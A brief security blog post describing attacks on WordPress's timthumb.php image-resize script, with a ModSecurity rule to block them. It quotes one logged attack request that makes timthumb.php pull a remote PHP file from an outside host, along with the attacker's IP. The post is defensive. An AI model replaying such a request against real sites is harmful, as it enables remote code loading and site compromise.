Timthumb.php hack attempts

timthumb.php

Timthumb.php hack attempts

Hackers are targeting WordPress for hack attempts by focusing on a ‘timthumb.php’ file. Here is an example of a request.

What is Timthumb?

TimThumb is an Image Resize for WordPress.

Offending IP: 78.46.100.241

/wp-content/themes/Webly/timthumb.php?src=http://blogger.com.indnique.com/mini.php

How to block it?

If you have ModSecurity on your Apache/Cpanel server, an easy way to stop this nonsense is by using this rule.

#Timthumb injection rule created by 0sw.com
SecRule REQUEST_URI "c=http" "deny,log,msg:'File Injection Attempt',status:406"

This will return a 406 Not Allowed Server Response when someone attempts to trick a php file to remotely load a payload using “src=http”.